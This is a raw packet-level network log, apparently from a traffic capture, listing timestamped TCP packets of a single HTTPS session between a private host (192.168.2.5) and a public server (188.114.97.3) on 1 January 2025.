Jan 1, 2025 16:54:14.038564920 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.038578987 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.038585901 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.038603067 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.038611889 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.038642883 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.038647890 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.038686991 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.039853096 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.039868116 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.039912939 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.039922953 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.039942980 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.039954901 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.040014982 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.040036917 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.040071011 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.040077925 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.040106058 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.040117025 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.120851994 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.120872021 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.120914936 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.120924950 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.121092081 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.121810913 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.121828079 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.121869087 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.121876955 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.121918917 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.126252890 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.126275063 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.126311064 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.126317978 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.126348972 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.126369953 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.126444101 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.126481056 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.126501083 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.126508951 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.126529932 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.126539946 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.126965046 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.126982927 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.127013922 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.127021074 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.127068996 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.127083063 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.127171040 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.127199888 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.127218962 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.127224922 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.127254009 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.127269030 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.128416061 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.128432035 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.128464937 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.128472090 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.128499985 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.128518105 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.128526926 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.128541946 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.128572941 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.128578901 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.128606081 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.128626108 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.209924936 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.209955931 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.210005999 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.210033894 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.210056067 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.210083008 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.210509062 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.210531950 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.210570097 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.210577011 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.210604906 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.210617065 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.214940071 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.214957952 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.214998960 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.215006113 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.215019941 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.215039968 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.215050936 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.215073109 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.215079069 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.215101957 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.215121984 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.215548992 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.215567112 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.215600967 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.215606928 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.215635061 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.215642929 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.215693951 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.215712070 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.215742111 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.215748072 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.215779066 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.215785980 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.216981888 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.217005968 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.217037916 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.217042923 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.217070103 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.217080116 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.217102051 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.217118025 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.217158079 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.217164993 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.217181921 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.220616102 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.243184090 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.298083067 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.298104048 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.298145056 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.298155069 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.298193932 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.299098969 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.299120903 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.299170971 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.299176931 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.299235106 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.303533077 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.303549051 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.303587914 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.303596020 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.303606987 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.303631067 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.303638935 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.303653002 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.303659916 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.303693056 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.303718090 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.304091930 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.304106951 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.304143906 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.304152012 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.304194927 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.304328918 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.304347992 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.304382086 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.304389954 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.304414988 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.304434061 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.305538893 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.305566072 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.305594921 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.305600882 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.305635929 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.305655003 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.305696011 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.305721998 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.305783033 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.305790901 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.305826902 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.389204979 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.389226913 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.389333010 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.389349937 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.389394045 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.391700983 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.391724110 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.391793966 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.391801119 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.391840935 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.408739090 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.408761978 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.408802032 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.408807993 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.408828020 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.408849001 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.408857107 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.408857107 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.408865929 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.408902884 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.408927917 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.409002066 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.409017086 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.409046888 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.409054995 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.409076929 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.409096003 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.409147024 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.409172058 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.409200907 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.409208059 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.409235954 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.409245014 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.411245108 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.411262035 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.411331892 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.411339998 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.411381006 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.411499023 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.411514044 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.411550999 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.411556959 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.411598921 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.413949966 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.416074038 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.477767944 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.477788925 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.477845907 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.477853060 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.477881908 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.477901936 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.480273962 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.480289936 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.480379105 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.480379105 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.480386019 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.480424881 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.497257948 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.497281075 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.497311115 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.497320890 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.497348070 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.497363091 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.497448921 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.497463942 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.497504950 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.497512102 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.497555017 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.497596979 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.497617006 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.497648001 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.497653961 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.497677088 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.497689962 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.497801065 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.497816086 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.497858047 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.497864962 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.497906923 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.499850035 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.499867916 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.499911070 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.499917030 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.499955893 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.499996901 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.500015974 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.500031948 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.500037909 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.500047922 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.500080109 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.504954100 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.566359043 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.566380024 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.566440105 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.566453934 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.566498995 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.568947077 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.568964005 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.569010973 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.569022894 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.569067001 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.586031914 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.586052895 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.586136103 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.586146116 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.586195946 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.586241961 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.586257935 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.586299896 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.586308002 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.586355925 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.586410046 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.586433887 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.586467028 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.586474895 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.586499929 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.586519957 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.586643934 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.586659908 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.586714983 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.586723089 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.586766958 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.588429928 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.588448048 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.588530064 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.588538885 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.588592052 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.588606119 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.588627100 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.588674068 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.588681936 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.588737965 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.591260910 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.655235052 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.655256987 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.655347109 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.655366898 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.655417919 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.657520056 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.657536983 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.657593012 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.657599926 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.657639980 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.674698114 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.674719095 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.674771070 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.674779892 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.674803019 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.674823046 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.674999952 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.675021887 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.675065994 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.675074100 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.675086975 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.675107956 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.675117016 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.675126076 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.675147057 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.675194979 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.675256968 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.675273895 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.675323009 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.675328970 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.675371885 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.677128077 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.677145958 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.677201033 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.677208900 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.677253962 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.677258968 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.677263975 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.677278996 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.677309036 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.677325964 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.677330017 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.677550077 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.680366039 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.743758917 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.743778944 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.743823051 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.743846893 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.743859053 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.743953943 CET	49983	443	192.168.2.5	188.114.97.3
